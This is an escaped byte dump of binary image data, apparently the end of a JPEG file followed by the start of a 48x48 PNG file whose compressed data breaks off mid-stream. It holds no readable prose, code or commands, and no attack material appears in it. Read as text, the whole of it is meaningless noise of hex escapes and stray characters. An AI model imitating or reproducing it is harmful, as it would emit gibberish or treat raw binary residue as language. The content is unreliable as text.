\xb4OL[\xde<^\xd9\xb0\xcb\xe4Vu\xf8\x02Fxd\xc8\xc8a\xcd<Lw\xb6\xc4p\xe2\xa2x\x92\xe6=h\xc0\x9f#\x9f\xd6\x92\x05\xe1\x97m\x98S\xb1\xd0;C1F\xe74\xe4G\xdb\xa0}\xd4\xd0\xaeQn\xe1\xf5\x13i\x17\x91\xe6\x87k!e\xd3\x9c2\x9d\xaa\xc0f\x90\x97bv U#\x1a\x8f\xcf\xeeh\xd2(e\xf5\x17\xb8\xc3\x0a\xa5\x89\x1f\x89L\xf1\xa8f\xb45:e\x90\x8d\x04\xf3\x8f\xfaT\xd0\xba\xc5\xe6G\xa6\xa6\x99\xeb\x17&5*+\x09\xd8\xb3\x12{\xd7,f\xfe\xd5\x5c74T\x5c.\x0dDK\xdc\xd4\xc8t\xaek\xb4\x88\x0c\x8b\xb9\x00\xe2\xba4W:X\xe1\xbbg\xbdK\x12NMLAX\xe1\x94\x1a\xd5\x82E\x8b1\xe1O\xdc\xd1\x97\xa7\xc8\x17\xf2\x8f\xd4T\xc3\x10'\x09#)\xf0w\xa3$\x13\x9eN\xc3\xbdb\xec\x0dm\x117\x92@~\x05K\x98\xd1r\xab\xa4y\xef]pV/\xa9\xb5\x1f\x8aRGg95f?\x91i%f;l*\x8cu.\x96\x01\x87\x83W\xb6\x89\xa5|\x0e;\x9a\xb5\xcb\xa8m\x11\x81\x85\xf8\xe6\xad\xb3\xa1Ge'e\x15B\x01\xf8\xae\xae\xa0\xa4\x84\xae\xd9\xd8\xd5]\xb5\x15\x07\xb5u\xc3p;\xd5\x19\x82\x82{\xd4\xa2'bN\x95\x19,p\x00\xef[\x1d\x22\xccZ\xc5\xad\xc02\xb7'\xc7\xc5\x03\xa2\xd9\x85\x02\xe6a\xef?@?\x96\xb5\x11\x0b\x1f\x8e\xe6\xb3GF\x85\xdb\x03\xfb\xd3p\x98\xe0\x5c\x82\xab\xe5\xdc\xe0VgR\xea\x90Y\xa9\x8e<I \xfc\xa0\xff\x00\xa9\xac[\xbb\x9b\xcb\xd7\xd54\x87\x1d\x87aY\xd5\xc9^\x9eN\xab\xd3R\x5cH\xe6f\x1d\xfb\x0a\x15\xe7\xf1\x0d\x8c\x03\xf9\x10)<\xf1^U\xe1\x90n\x0e\xf5\x060\x83T\xad\x92x\x1ejxCg\xfa\xaf[\xbe\xbfR\x9a\xbd8\x87a\xb5+gm\xacz\x92l\x9d\x87v\xa2\xda\xdb\xe5D\x93\x8c/\xe5O?zn$,x\xda\xb7$\x9d\x22!\x8fQ\xce6\x15k\x87\x00\x15\x1by4IYcL\x01\xbdg\xdd3\xcb/\xe1\xa3\xdd\xdf\x9f\x8a\x09\xb5\x1e\xbc\xcd;\x0f\xe5\xc7\xb2\x8f&\x9c\xd0\xa0\x8d~\xe7ns\xda\xa2\x14H\xd4\x22\x8f\xe5\xc5\xff\x00\xf4j\xb9&L\x9eI\xab 9\xb4G\x18\xc7=\xa8\x17\x1d6E$\xc4O\xfd'\x8a\xdb\xe9\x89\x11\xb8`\xec\x03\x01\xed\x07l\xed]s\xacH\xc0\x8co\xc5g|\x8f6\xa6{W\xc8\x0d\x1f\xc7cM,\x90\xdd\xa6\x924\xc8)\xfb\xa1\x1b\xae\x99P\x10~+:\xe2\xc1\x87\xf3-\xdf o\x8c\xee*v\x02\x0c\x96\xf3|\x8f\xde\xa6\xe5A\x1f\x89\x8b\x91\xf5(\xaeI\x84\xa3\xd3\x9b\xda\xe3`M@\xd7\x0c\x9b\xf0\x7f\xb1\x14\x07\xb5\x94\x11\xa8n\xad\xb1\x15\x07\xd96\xdev\xa5\xc9\x11I\xa9w\x8d\xb9\xf8\xa3\x1fr\xe7\x92?z\xd4\x1a=d\xeb\xb6\x8aP~\xa0+>%.\xe1@\xf8\xa7l[\xf1\x16\x12[\xb6\xe5=\xcbJ[\x9d\x17\x0b\x9d\xb0w\xa9\x8f\x1c\x02\xb2\xe1\xf4\x8e\xd4\x09\xf3\xeac\xb0\xad\x19!\x02S\xdb\xe6\x95\xba\x8f\x9c`\x91\xde\xb7\x8eAw\x18\x18\xfd\xe8\x91\x00\x13#\xbd\x0c\x1d\xb0\xd5*Jo\xc85\xa0\xcd\xbc\x822I\x075\x17\x17LF\x01\xc0\xa5\xdaBx\xda\xa8w\xa9\xe3\xee\x89bI\xc9\xa9\x89\x0b\xb6\x05T\x0c\x9c\x0a~\xda/N t\xeey\xa6WB\xcc\x9e\x8c\x1a\x17\x96\x1b\xfd\xa9g\x8dG\xb9\xce\x05\x1a\xf2\xe1s\xb9\x05\xbc\x0aNGg9cX\xc6_b\xb5\x0c@ROj\x93K\xdc>[H;\x0ekb\xac\xd9b\xedNt\x8bC3\x89\xe6_`\xfaA\xefB\xe9\xd6\xads(g\x18\x8d\x7fz\xd8\x9aH\xad\xa0\xd4\xc4\x05^\x05b\xd0RU\x14\xb3\x90\xaa9&\xb2\xba\x8fSy\xb3\x0d\xa6U8/\xdc\xd2\xbdB\xed\xee[\xdeJ\xc6>\x94\x1d\xea\x90\xc5<\xab\xed]\x0b\xe4\xf3MlB\xacq\xee\xcc3\xe4\x9a\xbaI\x1b&\xa5`@\xa2'O\x8f\x19c\x96\xf9\x19\xa8\xff\x00\xc2\xd6I2\x06O}5x\x003km\x10\xa9v\xf8\xe0S\x16\xd6\x82<M9\xd5!\xdc/\x8ai#\x86\xd1\x02F\xa0\xbe<l*\x8a\x0b>I$\x9aA1\x82\xef\x93\xbd\x1fd\x04\xd4\xa2\x04_\x9a\x0c\xecY\x82/z\x807r\x84\x8d\xa6>p\x83\xc9\xaa\xf4\x941\xdb\xbd\xe3\xee\xf2\xe5c?\xeaik\xd77\x17k\x04[\x84:W\xe4\xf75\xab\x22*\xcd\x1d\xba\xfd\x10.\xf5(\x1b\x82\xaa\xb0\x8ey?z\xa3\x02\xa7\x06\x9d\xe9\x90\x8b\x8b\xb6\x91\xfe\x91N\xc9\x05\x99\x04\x12\x7fJ\xd6\xf5\xc0\xcd\x8a\xed\xc2\xe9\x93\xdc\xbf\xb8\xfbSky\x11@\x19\xf2{\x1a\x8f\xc0\xc2\xccJ\x07#\xe4\x80)\x9b~\x90d\x19Xv\x1d\xc8\xdb\xfb\x9a\xcd\xb8\x85\x9aH\xa5\xdb*~\xc6\x94\xb8\x89\xe3\xf7!8\xady:DAN\xb7\x85\x1b\xc0m\xff\x00aKOaq\x1a\xe5\x1cH\xa3\xb6sY\x99c\xea\xae\x99\x13\x08\xe7\xff\x00\x10ia\xc3\x0a\x0b\x96\x8f\x11\xcb\xeeN\xcc)\xe9\xe1R}\xc3A\xf9\xe0\xd2\xce\xac\xa3K\xaeT\xf6=\xebz@~\x83\x83\x86V\xfd\xeaboL\x84'*~\x93\x5c\xcaP{w^\xea{U6#\xe0\xd4\x0eZ\xca`\xb8Y\x07\x1d\xc7\xc5_\xa8\xc6#\x9fZ}\x0f\xeeSJB\xe4\xfb\x1b\x91\xc7\xcd9\x19\xf5\xec\x8cG\xeb\x8bu\xfbS\xde\xc1\xa7\x94\xc9\x02I\x9eF\xff\x00z]f\xc6\xcdSju\xc0\xf1w\x1e\xe5\xff\x00z\x0bV\xb1\x90\x11\x8co\xf0hD\x11\xb0\xdcWc5\xda\x1b\xb5j]\x0a\xd7T\x95a\xc85\x15v,\x84\x06\xc9\xa2Is#.\x9c\xe0|Pp|T\x81R\x88\xae\xae<\xd7P\x06\xe2L\x0c\x0ejz}\xab\x5cK\xbet\x0eO\x9a\xeb\x1bg\xb9\x9b'\xe9\xeekF\xea\xe2+(t \x05\xb1\xb0\xacZ\x09q46p\x0e2\x07\xb5EdK,\xd7s\xf1\xa8\xf6\x1d\x96\xad\x14S^M\xad\x89\xc1<\xff\x00\xc5m\xd8t\xe8\xe0\x88<\xa9\x81\xd9|\xfd\xeb;\x93\xb1\x9d\xd3\xbak1\xd6\xd8c\xdd\x9b\x81Z1\xdb\xdb\xa0\xf7\x96s\xf1\xb0\xa3\xbeX\x0c\xfbPp\x05%}r#S\x1cg\xdcy\xf8\xab\xbd\x83\xcd%\x94{\x88\x00\xf1\x964\xac\xf7\x8f \xd1\x10\x08\xbe@\xc5+\xee\x90\xeabq\xe4\xd5\xd4\x16\xf6\xa8\xc0\xab1\x10\x06[\x03$\x9e\xe7\xbd5\x0ca\x13'\x9a\xebxp2{U\x98\x83\x96?J\xd2\xd09\x8e\x07\xc9\xdc\xd2\xd2\xbf\xa3g-\xc1\xe4\x8d+\xf7\xab\xdc1\xd3\xf2\xdb\x9a\x0f]\xfe_M\x86/\xea94\xa2\xbf\xc2\xf0\x97\xea:\x88\x07\xd1\x88\xb9\x07\xc9\xa7\xad\xff\x00\xc4\xb8'\x9c\x1a_\xf8U\xd5z\xb3\xc4\xc7\x1e\xb4eW\xe4\xd1\xe4\x06;\x99\xc7\xf9j{\x0e\xf4\xc3\xa3\xa6\x926gb(\xb1\xa0/\x8f\x1b\xb1\xf1C\xb6_N\xd65=\x97?\xa9\xa7\xfa|F1\xaeE\xce\x91\xea0?\x1c\x0f\xef\x8a\x99]M\x91c,v\x80j\x0b\xac\x0eH\xd4T\xf8\x03\x8d\xbc\xd2\xb3_\xca\xecI\x19\xcfwb\x7f\xed@\xea\xac\xff\x00\x8c1\x17\x00\xa0\xf718\x03\xcd.\x90z\x8b\xaa9c\x93\xeck\x13\x19\xddS\x7f\x8a\x9b#\x05\x07\xff\x00\x88\xab\xad\xcc\xf9\xd4J1\xfb\x0a\xceoR3\xef\x0c\xbf=\xaaVV\x189\x07\xedZ\xf1\x88\xd2k\x88\xa5\x04\x5cE\x9c\xf7\xc6\x7fz^n\x9e\x92)ky\x01\x1f\xd0\xc6\x80\xb3\xe7\x92A\xa87\x0d\x13d\xe4|\x8aLl\xe9J\x5c\xdb\xc9\x0c\x85]\x08\xf8\xa5\xa5\x8f\x03Z\x0c\x8e\xe2\xb6\x92\xee\x19\xe3\xf4\xe7\x01\x87\xcf\x22\x97\xbb\xb3\x08\xbe\xa5\xbbkN\xe3\xb8\xab\xbfU\x19\x07\xb1\x1d\xa9\x8biJ\xb0u\xe4sU\xb8\x87H\xd7\x1e\xe3\xb8\xf1AV\xd2u\x0f\xd4U\x81\xf9\xbf\x95p\xb3G\xf4\xb6\xe3\xfe+\xae\x95u\xebLiq\x91\xf1T\xb7q$~\x93\x1ewS\xe0\xd4! \x18\xdb\xf4\xf85gc\x93\x9a\x91\xbf\xc5EA$\x1c\xd6\xf4.7\xd8\xb0\x1fz\xe2\x0e>\xa5\xfe\xf5E\xd6\xdb\xad\x10G&?-,\x15`\xbesU$b\xbaee\xe4\xe7>*\x94\xd7\x03\xab\x8f\x15\xc4\xe2\x81<\x9d\x85\x03\xd77\x11\xdaC\xe9D2\xf8\xc5-on\xf2\xbf\xabpI\xce\xfa|\xd4\xda\xc5\xee\xf5\xa5\xdd\x8f\x00\xf6\xa6\xa1\x0d$\x81@\xe4\xd7=\x87\xbadh\x08:F\xdf\xb55;\xebl\x93\xed\x144U\x86-?\xdc\xd2w\xd7x\xf6\xa9\xdf\xc7\x8a\xce\xb7U\xddB\xef\x03Bs\xfe\x94\x80R}\xcd\xff\x00\xddX)\xfa\x9f\x93\xda\x8b\x14L\xed\xbdnM\x22\xb1\xa1s\x8e\x00\xe2\x9c\xb6\x83|\x01\xbdL\x10\x92\xc1Tnh\xf7\x85m\xe3\x11'\xd6~\xa3\xe2\xa5\xcb\x9d@\x09\x88,\x22\x8f\x7f'\xc9\xaa])\x0e ]\xf0w\xf9\xa6z\x5c%\xb5M\x8f\xa0m\xf7\xa5T\x86\xbd\x1a\xce7\xe4\xd3|\xe8)!\xcbj\xed\xaa\x9d\xbd\xb6\xb6\xea\x16\xe9\x99\x82\xb2\x8cPd\xb6\x9a':\xe38\xf2W \xd0\xc4hN\xfe\x9a\xfe\xa4U\xbc\x8bY\xd8Get\x97S\xdd\x07\xf4\xb7U^I\xa2B\xa6{\x86f\x18\x0er\xc3\xc0\xec*\x88\x90)\xcbJ\xbf\xfe\x00\x93\xfd\xcd;\x00R\x8a#\x18\x0d\xc5@\xdd\x94a\xdf\xd5\x93\x1aW\x80x\xa6\xe4\x94Ej\x92\x9e%\x97P\xf9U\xff\x00\xbeiH\x12[\xbb\x94\xb6\x80\x1d$\x85\xdb\xfdi\x8f\xe2\xcd1N-\xe3\xfa \x88\x22\xd7,\xae\xec\x8a\xc4\xba\x8eK\xbb{\x97\x19-\x8ddy\xde\xb2!\x91\xe2|\xa9#\x15\xe8z<\x82+\xec0\xca\xb0*G\x9a[\xf8\x97\xa4\xb4\x0f\xeb\xc2\x09\x8d\xb7\x15\xbf).\xa8\xad\x9d\xf8u\x0b6\x19|\xe2\x8d-\xaa\xba\xeb\xb7o\xd3\xb5a\xc4\xe5\x1b\xe3\xb8\xa7\xecn\x9e\x22\x19\x0eW\xb8\xabf\xba\x04\x93*\xc5]t\xb0\xf3\xde\xa3Q\xdcr<\x1a\xd4\x83\xf0\xd7\xf1`\x90\x1b\xe7\x8aZ\xfb\xa7M\x01\xca\x82G\x83I\x9c\xea\x9a \xeb\x8d\xd7\xff\x00\xaa\xbd\xbc\xd2Du#d\x0eEP\x92\xa7\x0c\x0a\x91\xe6\xa7\x93\x90w\xae\x9d\xf6\x86\x18\xc5?\xbe0\x12^\xeaxj\xcf\xbc\xb7*\xc5\x90\x11\x8f\xa9|Q\x9bc\x91\xb1\xa2\xac\xa2A\xa6S\x828q\xfe\xf5\x8b\x8e\xba\x19\xd0\xbe\x96\xe7ji\x8e\xb4\xf5\x07\xd4>\xaf\x9a\x15\xec\x05[R\x80>\xdc\x1a\xad\xb4\x9a[\x07qH\x0c\xa7\x22\xa1\xfc\xd4\x91\xa5\xbe\x0f\x15\xcd\xba\xd6\xe5\x17\xb78S\xe6\xaf\xa8\xd0\x228\x7f\x8a5[\xd8\xac\xe7+A4I\x8fj^y\x02\x8c\x0eh)q \xce\x075[XZyB\x8e;\x9a\xach\xd2\xc9\xa4nkBB\x96V\xdaF5\xb5b\xd1E%\x9a\xb4\xec#X\xa3\xd6\xc3sJXC\x9c\xc8\xdc\x0f\xde\x8b<\xc4\xfbWsY\xa2o\xeeNt\xae\xe4\xf6\xa5T\x15l\xb7\xb9\xcf\xedVE\xf7a=\xcey=\x855ml4\xebo\xa7\xbby\xfbU\xe2\x01A\x0b1\xd6\xdf\xaei\xa8c,B \xde\xa5\x14\xbb\x84E\xdb\xb0\xadk\x1bd\xb5@\xf2`\xb9\xacg\x9e\xbbP\x96\x05\xb4\xb5.\xc3\xdcEc\xce\xcc\xd2\x96c\x92MzGAr7\xe1Fk\xcf\xdc\xc4K\x1d\xb1\xbdO\x8a\xee\xee\x95\xa5\xd1b/k\x22&5\x15\xc0\xcdd\xde\xc2\xc8\xe4\x15!\x97b)\x8e\x9fx\xf6\xd2\x85m\x8f}\xf9\xad[\x8bx\xba\x8c>\xa4ED\xc0\x7f\xfbV\xb9\xc6\xecy\xf8.g\x8c\xfbe`>\xf5\xb7\xd3}\x1b\x98?\x98\x8a\xcd\x8eH\xac{\xcbg\x8d\xd8\x15*G \xd1:5\xd8\xb7\xb8\x1a\x8f\xb4\xd6\xb2\x9b\x9b\x80}b?NP\x02\x80\x01\xec)\x9b`\x5c\xa8\x1c\x91\x81Lu\xdbaq\x17\xaf\x0f\xb8s\xfa\xd2\x16S\x10\x06N\x1d\x0d%\xde(\xf6\x7f\xc3\xd6\x0bj\x86r1\x85\xd8\x9e\xf5\xe7?\x89$\x0ds;\x1e\xe7\x15\xa9i\xd6\xa5\x9e\xdf\xd1p\xa3m\xcd`\xf5\x97\x0d#\x1c\xe7&\xb8|x\xe5\xe7\xcbW\xa03\xa6l\x83\xce\xe2\xb7z|\xf1\x5c\xda\xfa\x17\x18(\xfb\x03\xfd&\xb0\x07\xba\x05a\xca\xeci\xae\x970\x12\x98\x9c\xe1\x5cs\xe0\xd7L\xf1\xdcHO\xf8\x93\xa4Ig9e\x5c\xa9\xf1\xc5eD\xe66\xcf#\xb8\xafwjR\xed\x1b\xa7\xdd\xe3X\xfa\x18\xd7\x95\xfe#\xe9rY\x5c\xb7\xb4\xe350\xcf\xfer,\x0e\x09Z<I\x11\xd8\xf2+{\xa3\xf54\x96?Jq\xa9{\x83\xb9\x15\xe5\xad\xa51\xb6\x0f\x06\x9bFh\xdcI\x19\xad\xe5\x8e\xcd\xbd]\xc7E\x8a\xe9=H\x0a\xb2\x9e\x01\xff\x00\x9a\xc9\xbd\xe9\x12@\xf8\xd0\xc9\xf7\xe0\xd1:/XxXa\xb0{\xa9\xe0\xd7\xac\xe9\xb7\x96\xb7\xf1`\xe9\x0d\xc1V\xae7,\xf0^\xde\x16n\x9f6\x9dJ\xa5\xbe\xd4\x9b\xab+a\x81\x07\xe4W\xd2\xa5\xe9\x90\xf2\xa8\x07\xc8\xa4:\xb7G\xb6\x9e\xdf\x12G\x83\xd9\xd4n)\x8f\xf2?'\x8b\xc2\xa4\x83O\xa7 \xca\xf6>){\x98\x8a6G\x07\xc5iu~\x9b-\x9b\x1d\xc4\x91\xf6q\xfe\xfe)\x15#t\x7f\xa4\xfe\xd5\xdf\x8b7\x19R\x17\xd4\xba\x0f=\xaa\xea{\x1a\x0c\xc8b\x93m\xc7b*\xe8\xda\x97#\xf5\xab\x05\x98`\xd1\xa39\x5c\xd0y\x15hN\x1b\x1ek}\x81\xdc>\x9c\x93J\x1dN\xfbnM5\xd4G\xb75\xdd-Tk\x95\x86\xca*Ph\x95,\xed\xf5\xb65\x1aZ0\xd7\x12\x99\xa4\xe3\xb5D\x8c\xd7S\xe4\xe4 \xa3p06\x02\xb2\x1f\x9aP\xa8\x11vQB\x89K\x8c\xb1\xd2\xbd\xfc\x9a\x11\x908\xdc`\xd3\x16\xb8vPx\x03\x8a\x9d@\xcd\xbc)\xa7Q]1\xfe\xedDl\xc8B\xa8\xc0\x1c(\xedVE/\x82O\xc6)\xebD\x86\xd5}i\x86\xe3\xe9Z\xc5\xba\xfe\xd4n\x9bj\xb6\xf1z\xb2\x8fq\xe0R\xd7RK5\xf2\xc6\x999\xe0\x0a\x1d\xdd\xf4\xb3>\xa1\xedQ\xc0\xad?\xe1S\x11\xfe'\x85\xa4\x00\x83\x0e\xa5\x04s\x5c\xf2\x96M\xd1\xaf\xd2z\x15\xd7\xe0\xc4\xc3\x00\xf8n\xf4.\xa1\xd1\x12C\xfc\xdbS\x03\xe3\x1a\xe3\x19S\xf7\x14\xf7R\xebR\x17)\x19\x0a\x01\xc0\x02\xa2\xd7\xae8\xf6\xc8\x01\xfb\xd7\x09~N\xda\xe1\xe3z\xbfJ\x9a\xd9\xb1\x22jC\xf4\xb8\xefI[\xdc\xcdg \xcb\x1d>k\xe9~\x9d\x97P\x8c\xaa\xe9R\xc3u<\x1a\xf3\xbd\x7f\xf8VE\xd4\xf6\xcb\x90\x7f!\xef\xf65\xdf\x0f\x9e^2f\xc6T\x8d\x07R\x83!\x82\xcc\x06\xc7\xcdc^\xda\xbc2\x10W\x04v\xa2K\x0d\xc5\x95\xc1\x000+\xca\xf8\xa7\xa1\xbb\xb7\xbc\x84Es\x85`6o\x15\xdao\x1egHW\xa3\xde\xfaM\xe8\xcd\xbcm\xb6\xf5\x1dZ\xd3\xd0\x90\x5cB5!\xe7\x15[\xab\x09U\xb3\x18\xd6\x0fu5h\xde\xfd\x22\xd1\xb2\xa8?\x9b\x15x\xde\xe0\x5c]\xb0\x18@ry\x14\x19\xcc\xaer\xfb|f\x99\x9d\x8eI\x9ep>\x13\x1b\xd1\xadl\xa5\x91C\xa4\x024<I)\xe7\xec;\xd6\xb7 \xa4\x09\xff\x00\x92s\xfe`?j]\x1fC\xe7\xb05\xa1x\x12\x18\x16\x04<nOr|\xd2\x16\xe0;\xbav5\x9cy\x1a\xf2;Io\x15\xd2\x1f|gKb\xb4fH\xba\xc7M*\xd8\xf5\xd0q\xe6\xbc\xff\x00O\x9d\xe1\x9bA9\xd3\xbf\xdcV\x8d\xf35\xbc\xd1\xdd[\xb1P\xe3;W\x1c\xb1W\x97\xea\x96oip\xc8\xca@\xce\xd5\x16s\x01\xecs\xb1\xe0\xd7\xb3\x96\xca\xd7\xad\xd8\xb1\xc6\x9b\x85\x19\xdb\xbdx\xde\xa7c-\x9c\xe5\x1c\x1c\x03\xcdo\x0c\xe6\x5c^\xcb\x05a\xa4\xeaJ\x7f\xa7\xde\xb2\x91\xb9\x04ps\xb8\xac\xabY\xb3\xecc\xbfbh\xac\x0a\xb6En\xcd\xf1Q\xed:?_\x925\x09>dN3\xdcV\xea\xcf\x05\xd4:\xa1ul\x8e+\xe6\xf6wEN\x1b\xfb\xd6\xad\xa5\xcb)\x0f\x0c\x84\x11\xe0\xd7\x9f?\x8a^\x9a\x94\xef\xf1\x1cF7-\x18?\xe6C\xc1\xaf1u\x1a\x1f|\x5cwS\xf9k\xd7\x8b\xc8\xba\x84^\x85\xd0\x09!\xd8?c\xf7\xaf5\xd6\xec\xe5\xb3\xb99\x1bgc\xe6\xb7\xf1]qJ\xce\xd9\x97Cq\xdb\xe2\x823\x14\x98#j;\xe1\x86G\xea*\x92.\xb5\xf9\x1cWk\x19H#\x90v\xa9\xe0\xe4P\xa2b\x0e\x93D\xab(\x9b\xa5\xf5!\xc8\xed@\xb7r-eQ\xb1\xe6\x98\x8c\xecT\xf0ih\xc6\x99\xa4C\xddM[\xd0%\xb7\xf8#\x14h#2>;\x0eh\x16\xc7\xf9B\x9d\x0e\xb1\xc4\x14c8\xc9\xac\xfa\x1f\xff\xd9\x00\x00\x0c\x82\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x000\x00\x00\x000\x08\x06\x00\x00\x00W\x02\xf9\x87\x00\x00\x0cIIDATx^\xed\x9a\x09l\x5c\xd7yF\xcf}o6\x0eW\x0dIq\xa7H\x8a\xa2\xa8\x8d\xda)S\x92\x15\xdb2\x92\xc8Rk;N`;\xf1\x16\xbbq\xd3$m\xaa\xd6\x89\xe3\xb4\xaea#\xb5\x936\xa8\x8d\xb8i\xd3\xd6m\xed\xa2\x0b\xd2\x16ik\x18\xa9\x9bZK\x97\xd8\xb2MY\x5c\xc4M\xa4\xb8.\x22\x87\x1c\x0eg\xc8Y\xdfr\xab\xc1{\xc63\x08\xa6\xf0\x08\x8c\xd2\x00\x1d\xe0\xc3\xff\xeepf\xeew\xfe\xe5\x0e\xe6\x81BJ\xc9\xcf\xf3C\xf9\x19\x1b\xf8\x7f\x00\xd7J\x803g\xcep\xf2\xe4\xc9\x0f\x05 \x04\xdcw\x84\xc7\x86fh\x7f{\x90\xb3\xa6\xf9\xd3\x05x\xfe\xf9\xe7\xb9\xf9\xe6\x9b\xffw\x80H$Bgg\xe7\x87\x02\xd8U\xc7\xbe\x0dE\xb5\xcf\xb64\x04\xd4\x86\xbc\x8e\x1f\xbc|\x8a'z\xc7\x18Zs\x00\xc7\xdb\xda\xb5\x90[E\xdc{#\xdfi\xbd\xeb\x05\xf7\xd1/\xbd\xa3\xdc\xf3\xc5?\xfe\xe4K_+\xed|\xf2~\x9e--\xc9)d\xeb}\x8f\xb2\xf9\xee\x87Y\xbf{\x0b\xc2%\xfe\xcf\xcd\xc0\xb1\xdd<\xbc\xf7\xd0\xf1\xb6\x9a\x1dw\xa0\xa8nj\xf6|\x9e\xfd\x9f\x1d\xf0\xdf~\xdf\xaf?\xd1\xf8\xe9\xe7f\x1e\x7f\xf2\x99?\xf9\xe4\xc3_\xff\xf3c'_\xee-\x7f\xe4\xec\xbcr\xcbw\x7f\xc8\x8e/\xfc\x16\x95G\x8e\xe2\xafX\x07\xca\xcf\x0e`}\x01\xc5'\x0e\xf8~w\xff'^@\x08'\xb9?\x1eU\xf8\xc2[\x0f\xf2;\x8f<\xe0\xfb\xe5\xa3\x95\xdc\xb4\xa3\x9c'\xef\xdb\xcekO\x1f\x08\xfc\xf0\xc5\x07\x8e=\xff\xcd'\xbe\xf1\xd0\xe3\x7f\xf8F\xcbg\xffn\xda{\xebK\x17\xd8\xf1\x95?\xa2\xeac\xf7\x93\xbfi\x13\x8aG\xbdn\x00w\x1f\xe2\x99\xfd\xb7=VVP\xda\x08\x80)%\xdf\xfa\xd7)\x9e}m\x92\xef\x7fq\x0b\x07\x9b\xd6\xd1;\x11\xa7\xac\xc4O\xcaT\x88j.\xdc\xb9y\xb4l\xab\xe2\xe1;\xb7\xf3\xd2\xd7\x0f\xfbN\xff\xd9\xbd\xbb\xfe\xfa\xbb\xbf\xf1+_}\xfa\xf7\xff\xea\xd6\xcf}\xaf?p\xf4O'\xd8\xfa\xdb\xffB^\xd3\x0dY\x9fB\xd9hg\x1d\xfb>r\xa0\xe1s\xdb\x8f~\x0d\xa4d!\xae\xf3\xc8+\xc3l)\xf7\xf1\x8fW\xcdg\x0c\x07c05\x9f\xa6\xa1.\x17\xb7\x02R\x82$\x13\x05\xa6\x84\x98\xa6\x22\x85JEM9U\xb5e\xdc\xf11\xa9\xf8TYq\xe6\xc7C\xbf\xf8\x9b_\xee\x5cd\xf9R'\x90Xs\x00UA|\xe6\x88xa\xff\x9d\xdfv\xabn\x1fR\xea|\xf3\xf5)v\xd6\xe4\xf0\x91-\x01\x821\x13\x13\x85P\x02\x221\x9d<\xbf\x0b\xa1`\x9b\xffIQ\x902\x05iS2\x9d!\x8f\x8d\xf6\x01\xe6O\xa5\x02\xc7\xf7\xf0\xe0\xee\xb6c\x87j\xb6\x1dG\x1a)\xc0\xa4{:\xces'j\x18\xbe\x92\xe2B\xcf\x22\x89\xb4\x89\xdb\xe3\xc2#$n\x97\x00\xa4eV8\x86Y\x05\xc4\xabJ.\x5c\x0a\x19,\x0f_\x00Rk\x0ePZ@\xe0\xf66\xdfs\xadw=\x8f\xd4\x13Hi\x10K\x19 \x04\x85\x85>6\xe7\xfaij,B\xd7%\xb1X\x1a!\x04.!-\x93\x16\x07\x12\x81\x14\x0e\x108P>a\xd0\xd1\xdd7\x81\x11\x9bZ\xf3\x19\x10\xc0=\x87xz\xf7\xc7\xbfR\x9eWX\x86\xd4\x93H\x99\xc9~\x92\xed\x959\xe8R\xa0\xda\xbd\xae\xba\x05\x9e\x22\xafmL\x02\xd8\xc6\xad\xb5\x04\x10X\x10\x08{-\x99\x09F\x09O\xf7\x0d\x02\xf3k\x0e\xd0\xb2\x81=GZ\x1b\x1e\xddv\xd3\x971\xd3Q\x90f\x06\x80s\xa3\x09\xf6\xd4\x94\x22\xc0\xca\xf6\xfb\xc6llgm\x1b\x07\xa4\x03\x04\xd2y\xbegx\x81#\xd5\x97w/$\xdcM\xddc\xda\xcc\x9a\x01x](w\x1f\x16/\xb6~\xe2\xdb\x1e\xc5\x88#\x8d$\x90\x01\x90\xbc;\xa5\xf1\xd4.\xbf\xd3*`\x1b\x13HV\xb6\x0fH!\x90\x12\xb0\x81l@\x5c\x8a$o\xa1\x9fO\xef\x0c\x96D\xaa\xf2^\xfe\xea+\xe1\x03\xc0\xdc\x9a\x00|t\x17\x0f\xec?|\xdb\xc1\xaaM7b$\x82 M\xc0\xccDf\xe2.J\xf2\x5c$\x0d\xe9\x0c'\xd8}\xbe\x22\xe3\xb6mV\xa9R^t\x9a\x87\xf2\xdf t\xa4\x86\xd7OM\xd5\x96\x17\xa9m3\x8b\xc6\xabY\x02\xac>\xb8'Z\xbd\xcf\xb6\xde\xf9{\x18\xf1+HS\x03i\x99\x1f\x8fJj\x02\x05V\x06\x85cZ\xb2\x8aqa9v\xaa$\xec\xb5\x04-EI\xfb_\xa06\xb9(\x09\x16\xe2v\xbb\xd5\xcdU\xeeCW\x01^\x07\xd2\xd7\x0e`\x0d\xee3\xfb\x8e=V\x91\xe3\xf3b&\xe7\x91\xd2\x04[\xe7&U\x0e\xd4\xfa\x11\x80*V\x19N\xa7\xc7q\xda\xc5\xce:\xf6\xbc\x98\x92\xe2\xb7^\xc1W\x17\x86\x0d\xf7\xa2\xc4NQ\x168\xcf\xd6\xea\xf8\xfe\xff\xe8I\xe6\x03\xa1k\x06\xd8\xb9\x81=7\xee\xaf\x7ft\xdb\x91\xcfc,\x8fX\x83\xcb\x07\x00\xa6ry\xf0\xb0\x1fU\x91 Wi\x15@:@\xce\xda\x82\xb2*w\xfeu\xf2\xd7\xf5C\xd5MP\xd0\x0c\xeb\xa6(/)\xa4\xb1<\xb4]UXo\x98\xd7\x08\xe0V\x11\xf7\x1c\xe6\xc5\xab\xad\xe3&1e}iI\xc3\xaa\x80\xa9\x91^\x1a\xa0w\xfe\x06\xb6\xae\xf7`Ji\x0f\xe7\xca\x1e\xb7\x8d;\xa6\xed*\x81)!\xd9\xdfC\x95~\x16Q\xdf\x08\xe5\xb7\x00&\x946QQT@\xa1_-)/r\xb5L-\xe8}\xd7\x04\xf0\xf1]<\xb4\xf7\xd0\xb1\x83\x95\x0d{\xd0B\x17\xd1b\xa3\xa4\x17;-EzX\xd2Tr\xf3\xce\xa1* 